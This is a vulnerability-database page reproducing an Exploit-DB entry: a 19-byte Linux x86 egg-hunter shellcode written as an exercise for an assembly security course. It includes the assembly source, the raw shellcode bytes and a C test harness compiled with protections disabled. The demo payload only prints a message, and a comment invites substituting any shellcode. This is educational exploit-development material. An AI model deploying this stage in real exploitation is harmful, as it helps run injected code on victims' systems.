Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Linux x86 Egg Hunter Shellcode 19 bytes

🗓️ 10 Aug 2015 00:00:00Reported by Guillaume KaddouchType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 34 Views

Linux x86 Egg Hunter Shellcode 19 bytes. Exercise for SLAE course, using 4 bytes egg. Egg signature altered

Code
/*
Title: Linux x86 Egg Hunter Shellcode (19 bytes)
Date: 4 August 2015
Author: Guillaume Kaddouch
    Website: http://networkfilter.blogspot.com
    Twitter: @gkweb76
Tested on: Ubuntu 14.04.2 LTS x86, Kali Linux 1.0.9 x86

This code was created as an exercise for the SecurityTube Linux Assembly Expert (SLAE).

Egg signature = 0x50905090 (push eax, nop, push eax, nop)
Usually egg hunters use a 2 * 4 bytes (8 bytes) egg because the first address check could match the hardcoded egg signature in
the egg hunter itself. As we do not store hardcoded egg signature below, it allows us to check only 4 bytes once.

egg-hunter.asm:
----------------

global _start

section .text

_start:
        mov eax, addr                   ; retrieve a valid address (shorter than using JMP CALL POP)
        mov ebx, dword 0x5090508f       ; egg signature altered: 0x50905090 - 1
        inc ebx                         ; fix egg signature in ebx (the purpose is to not store the hardcoded egg signature)

next_addr:
        inc eax                         ; increasing memory address to look at next address
        cmp dword [eax], ebx            ; check if our egg is at that memory address, if yes set ZF = 1
        jne next_addr                   ; if ZF = 0 (check failed), then jump to next_addr to check next address
        jmp eax                         ; we found our egg (ZF = 1), jump at this address

        addr: db 0x1
*/

/*
myegg.c:
-----------
Compile with: gcc -fno-stack-protector -z execstack myegg.c -o myegg
*/

#include<stdio.h>
#include<string.h>

// Egg hunter 19 bytes (\x00 \x0a \x0d free)
unsigned char egghunter[] = \
"\xb8\x72\x80\x04\x08\xbb\x8f\x50\x90\x50\x43\x40\x39\x18\x75"
"\xfb\xff\xe0\x01";

// Print 'Egg Found!!' on screen
// You can swap it out with any shellcode you like (as long as you keep the egg mark)
unsigned char shellcode[] = \
"\x90\x50\x90\x50" // egg mark
"\xeb\x16\x59\x31\xc0\x50\xb0\x04\x31\xdb\xb3\x01\x31\xd2\xb2"
"\x0c\xcd\x80\x31\xc0\xb0\x01\xcd\x80\xe8\xe5\xff\xff\xff\x45"
"\x67\x67\x20\x46\x6f\x75\x6e\x64\x21\x21\x0a";

main()
{
        printf("Egg hunter shellcode Length:  %d\n", strlen(egghunter));
        int (*ret)() = (int(*)())egghunter;
        ret();
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
10 Aug 2015 00:00Current
7.4High risk
Vulners AI Score7.4
linux x86egg huntershellcodeslae course4 bytes
34